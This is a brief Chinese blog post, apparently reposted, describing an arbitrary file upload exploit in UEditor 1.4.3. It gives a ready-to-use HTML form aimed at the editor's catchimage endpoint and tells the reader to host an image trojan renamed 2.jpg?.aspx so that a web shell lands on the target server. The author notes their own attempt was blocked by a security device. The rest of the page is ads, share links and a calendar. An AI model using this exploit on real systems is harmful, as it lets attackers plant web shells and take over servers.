小翔博客

UEditor 1.4.3 任意文件上传漏洞

佚名 4年前 (2020-06-09) Safe 4013人围观抢沙发百度已收录

今天测试一个项目，进到后台之后发现使用富文本web编辑器

SRE实战互联网时代守护先锋，助力企业售后服务体系运筹帷幄！一键直达领取阿里云限量特价优惠。

构造一个恶意的html文件，方便我们传输数据过去: xxxx为攻击地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

然后制作一个图片马，文件名改为2.jpg?.aspx上传至自己的服务器，通过构造的恶意html进行上传

我的被安全设备拦截了

看看别人成功的案例

扫码关注我们

微信号：SRE实战

拒绝背锅运筹帷幄

赞 0 赏分享

转载请注明 : 文章转载自小翔博客 UEditor 1.4.3 任意文件上传漏洞

本文标题：UEditor 1.4.3 任意文件上传漏洞

本文链接：https://liuyixiang.com/post/114281.html

上一篇 : 07.Django-缓存

下一篇 : 向excel中插入柱状图

评论列表暂无评论

发表评论

« 2024年2月 »
一	二	三	四	五	六	日
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29